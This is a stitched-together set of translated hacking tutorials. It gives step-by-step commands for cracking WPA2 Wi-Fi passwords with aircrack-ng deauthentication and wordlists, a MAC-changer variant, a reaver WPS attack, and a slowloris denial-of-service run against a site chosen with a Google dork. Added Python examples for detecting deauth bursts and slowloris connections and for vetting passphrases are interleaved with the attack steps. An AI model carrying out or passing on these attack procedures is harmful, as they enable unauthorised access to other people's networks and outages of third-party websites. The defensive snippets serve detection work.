airodump-ng -w WPACap -c 1 mon0. In place of WPACap put a file name of your choice.
The 1 after -c is the Channel no. It is shown in the picture.
Then type the next command. Open a new Terminal.
aireplay-ng -0 0 -a {BSSID number} -c {Client Mac} mon0, then press Enter.
The thing to remember here is that {router mac} is where the BSSID number of your target goes. {Client Mac}
is the number under STATION for your target. I think that is clear enough. If it is still not clear,
look at the pictures and substitute the data of your target. It is not very hard. After typing this aireplay
command you will see data being sent. As more data is sent, it reaches the
target and within a few minutes makes the line drop. The picture shows it Sending.
Then type the final command.
aircrack-ng -w /root/desktop/1.1million wordlist.txt WPACap-01.cap. Because I put
1.1 million wordlist.txt on the Desktop, the file location is different.
It is shown in the picture. In the picture the wordlist file was kept under /pentest, so it is
called from under Pentest. In place of WPAcap-01.cap put the file name you set earlier.
If you do not know it, you can type ls in the Terminal to check. For example, if the file name you noted was 3thic0kiddi3,
you have to call it as 3thic0kiddi3-01.cap.
After this aircrack command is typed, it checks against your Wordlist and tries the possible passwords
on your target. If the Wordlist runs out and the password has still not been found,
search again with darkc0de.lst. If that still fails, carry on with other Wordlists. It takes perseverance.
A good many WiFi owners set easy passwords because they are afraid they will not
remember them themselves. In that case you are sure to get it. If you want something, do not give up easily.
Only effort brings success. That completes WPA2 Hacking.
WPA2 Cracking Method (2)
This is another method that can crack a WPA2 line; it is called the Mac Changer Method.
It is a method of changing the MAC and cracking from the client side.
It is the same as the method above, only slightly different. If one way does not work, try the other.
The first command is airmon-ng start wlan0.
After that type ifconfig mon0 down and press Enter.
We are going to change the MAC. Type macchanger -m 00:11:22:33:44:55 mon0.
This creates a fake MAC. Whatever our current MAC is,
we have now changed it to 00:11:22:33:44:55.
Then type ifconfig mon0 up. See the picture.
The next line is airodump-ng mon0. Every line present is now listed.
On my machine only WPA2 lines are shown. I have taken the line called Victima as the
target.
Note the data of your target. The command to type is
airodump-ng -c 6 --bssid 1C:7E:E5:32:1D:54 -w crack mon0
(Note: replace the Channel No. and BSSID No. with those of your target)
After that command is typed, only the Data of your target is shown in the picture.
Open a new Terminal.
Type aireplay-ng -0 30 -a {BSSID of your target} -c {Client Mac number} mon0.
See the picture for an example.
After that aireplay command you will see requests being sent to your target.
Gradually, as in the picture, WPA Handshake appears, and then it can be cracked.
Open a new Terminal.
Enter aircrack-ng -w /root/Desktop/darkc0de.lst crack-01.cap and press Enter.
Besides Darcode, the 1.1 million words list can also be used. Because I keep the Word list on the Desktop,
it is called as Desktop under root. In place of Crack-01.cap put the name
you gave. After this aircrack command is typed, you will see it cracking with the passwords in the Words
List. At the end, as in the picture, the Key is obtained.
Key Found=abril4de1969. Even one this complicated can be found after a short while of matching.
The Cracking Time is rather unpredictable. Only extremely difficult passwords tend
to take long.
That completes WPA2 Cracking Method (2).
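The aireplay-ng -0 step in both WPA2 methods sends deauthentication frames so that the client reconnects and the handshake can be captured, and that burst is something a network owner can watch for. The following is an added example, not part of the original book: it flags deauthentication bursts in management-frame records, and the record layout, MAC addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "02:00:00:aa:00:01"    # constructed, locally administered MACs
STA = "02:00:00:bb:00:02"

# Constructed records, as a monitor-mode sensor might log management frames:
# (seconds, frame kind, transmitter, receiver, BSSID)
SAMPLE_FRAMES = (
    [(1.0, "beacon", AP, BROADCAST, AP),
     (5.0, "deauth", STA, AP, AP)]                                   # one ordinary disconnect
    + [(60.0 + i * 0.1, "deauth", AP, STA, AP) for i in range(30)]   # 30 frames in 3 seconds
    + [(70.0, "eapol", AP, STA, AP)]                                 # client re-authenticates
)


def find_deauth_bursts(frames, window=10.0, threshold=10):
    """Flag (BSSID, client) pairs that see >= threshold deauth frames inside
    `window` seconds, and note whether a handshake (EAPOL) followed."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps still inside the window
    alerts = {}
    for ts, kind, tx, rx, bssid in sorted(frames):
        # The client is whichever end of the frame is not the access point.
        client = rx if tx == bssid else tx
        key = (bssid, client)
        if kind == "deauth":
            seen = recent[key]
            seen.append(ts)
            while ts - seen[0] > window:
                seen.popleft()
            if len(seen) >= threshold:
                alert = alerts.setdefault(key, {
                    "bssid": bssid, "client": client, "first_seen": seen[0],
                    "peak": 0, "handshake_after": False})
                alert["peak"] = max(alert["peak"], len(seen))
        elif kind == "eapol" and key in alerts:
            # A handshake straight after a burst is the capture the attack is after.
            alerts[key]["handshake_after"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in find_deauth_bursts(SAMPLE_FRAMES):
        print(alert)
```

A single deauthentication frame, such as a client leaving normally, stays below the threshold and is not reported.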
For the security of WPA2 owners
For WPA 2 owners the points are: the use of passwords left at Default,
making the Password long and complicated, filtering the Mac address,
and hiding your WiFi line on the network. When setting
the password, if you use words in Myanmar font, they are not in the Wordlist, so it
cannot be hacked easily. Besides that, if your line gets slow, restart it.
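The advice above comes down to keeping the passphrase out of any wordlist an attacker is likely to hold. As an added example (not from the original book), this check applies that to a candidate WPA2 passphrase; the wordlist is a constructed stand-in, and the function name and rules are assumptions for illustration.

```python
import string

# Constructed stand-in for a cracking wordlist. "abril4de1969" is the key the
# tutorial above recovered from its wordlist; the other entries are made up.
SAMPLE_WORDLIST = {"password", "12345678", "abril4de1969", "myanmar2012"}

CHARACTER_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
                     string.digits, string.punctuation)


def vet_wpa2_passphrase(passphrase, ssid, wordlist=SAMPLE_WORDLIST):
    """Return the reasons a passphrase is weak; an empty list means it passed."""
    problems = []
    # WPA2-PSK passphrases are 8 to 63 characters long.
    if not 8 <= len(passphrase) <= 63:
        problems.append("length")
    lowered = passphrase.lower()
    # Dictionary runs commonly also try case changes and trailing digits,
    # so compare the lower-cased value and the value with its digits stripped.
    stem = lowered.rstrip(string.digits)
    if lowered in wordlist or (len(stem) >= 4 and stem in wordlist):
        problems.append("wordlist")
    if ssid and ssid.lower() in lowered:
        problems.append("contains-ssid")
    if passphrase.isdigit():
        problems.append("digits-only")
    classes = sum(any(c in group for c in passphrase) for group in CHARACTER_CLASSES)
    if len(passphrase) < 16 and classes < 3:
        problems.append("short-low-variety")
    return problems


if __name__ == "__main__":
    for candidate in ("abril4de1969", "Password2012", "Teak_Lantern 47 rides the Monsoon!"):
        print(candidate, "->", vet_wpa2_passphrase(candidate, "Backt") or "ok")
```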
MY Book Ref: Youtube(WEP,WPA2) Hacking,BT 5 wireless penetration testing book
Video Trainings on You Tube for further study:
http://www.youtube.com/watch?v=y9XV2MBPM5M
http://www.youtube.com/watch?v=FZso9pofw-0
http://www.youtube.com/watch?v=rzzgzP4hEo0
http://www.youtube.com/watch?v=T3iDWP2xeFw
http://www.youtube.com/watch?v=dB21RAvbcDQ
http://www.youtube.com/watch?v=aKQiAAzmW90&feature=fvsr
http://www.youtube.com/watch?v=BiJp9ZajJlg&feature=fvsr
Download the Video Links above and study them. They are Videos showing WEP and WPA2 being
cracked.
………………………………………………………………………………………………………………………………………
If you do not understand the techniques I have shared here, as far as I have learned them,
you can contact me directly at [email protected]. Hacking is by no means outside
Cyber Law. So keep your good judgement in hand when you experiment. If there are mistakes, you can send
suggestions as you see fit. Following those suggestions, additions will be made in the 2nd Edition.
I like all Hackers from BHG,MHF,MHU,Planet Creator,MZ,MCT,Ghost Area
::::::::::Next books Coming Soon see you:::::…
With constant respect for the readers
3thic0kiddi3
How to hack wpa or wpa2/psk
We will hack with reaver-1.1.
Open bt5. In the terminal:
wget http://reaver-wps.googlecode.com/files/reaver-1.1.tar.gz
Then wait a moment.
Then extract the file: tar zxvf reaver-1.1.tar.gz, then ls
Then cd reaver-1.1, then ls, then cd src
Then ./configure, then make, then make install. See the pictures below.
Let's get to work.
1. First open a terminal and type airmon-ng,
then type airmon-ng start (interface).
Then airodump-ng mon0
Then look at the one you want to hack. You need to know its BSSID, CH and ESSID.
The one I want to hack has BSSID 28:10:7B:8C:7C:22, CH 3 and ESSID kira.
OK, let's start. Open a terminal and run reaver -i mon0 -b 28:10:7B:8C:7C:22,
then just leave it running.
OK, the password has come out.
Using slowloris script for DDos attack in backtrack 5 Posted by Aung Kyaw Moe
We are going to do a Dos Attack using the slowloris script in Backtrack ... First download the txt file below...:P
http://www.mediafire.com/?zdljotrlp1tclp1 Then put it on the Desktop... As shown in the picture, we will create a file from the terminal... Give the command as in the picture...
As in the picture, we will create a file in the Terminal, using the nano command: type nano slowloris.pl and it will come up as in the picture below...:P
As shown in the picture, open the .txt file you downloaded earlier, then, as shown in the picture, press ctrl+a and drag it into the file created in the Terminal. It is shown in the picture...
It will land in the Terminal as below...:P
Now we save. Press ctrl+x... It will come up as in the picture below.
It will ask whether to save under the name slowloris.pl; press Enter... It will end up under the Home Folder; bring it onto the desktop...:P
Type chmod 775 slowloris.pl... Let me explain chmod 775 a little: chmod means read, write, execute for all. Next we will look for a target site using a Dork: simply search Google for inurl:php?id=1...:P
Pick a site you like...:P I picked the site below...:D
Type perl ./slowloris.pl -dns http://www.target.com
It has started working. See the picture below.
OK, leave the Terminal open and reload the site you opened a moment ago, to find out whether it has gone down or not. Reload it...
It has gone down... The main thing I want to say is do not close the Terminal... If you close the Terminal the DDos comes to an end...
Thank you. I'll keep trying...:P
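Slowloris works by holding many connections open with request headers that are never completed, which is why the site stops answering while the script runs and recovers once the Terminal is closed. The following is an added example, not part of the original post, showing how that pattern stands out in a snapshot of a web server's open connections; the record layout, addresses and thresholds are constructed assumptions.

```python
from collections import Counter


def sample_snapshot():
    """Constructed snapshot of open connections on a web server:
    (client IP, seconds since connect, request headers complete?, bytes received).
    The addresses come from the documentation ranges 198.51.100.0/24 and 203.0.113.0/24."""
    conns = [
        ("198.51.100.7", 2, True, 412),      # ordinary request in progress
        ("198.51.100.9", 1, False, 80),      # just connected, headers still arriving
        ("198.51.100.23", 40, True, 9000),   # long download, but the request is complete
    ]
    # One client holding 300 connections that trickle in a few header bytes each.
    conns += [("203.0.113.50", 30 + i % 200, False, 60 + i % 20) for i in range(300)]
    return conns


def find_slow_header_clients(conns, min_age=20, min_conns=50, max_rate=10.0):
    """Return {client IP: count} for clients holding at least `min_conns`
    connections that are older than `min_age` seconds, still have incomplete
    request headers, and receive data slower than `max_rate` bytes per second."""
    stalled = Counter()
    for ip, age, headers_complete, received in conns:
        if headers_complete or age < min_age or age <= 0:
            continue
        if received / age <= max_rate:
            stalled[ip] += 1
    return {ip: count for ip, count in stalled.items() if count >= min_conns}


if __name__ == "__main__":
    print(find_slow_header_clients(sample_snapshot()))
```

On Apache, mod_reqtimeout with its RequestReadTimeout directive is the control that closes connections of the kind flagged here.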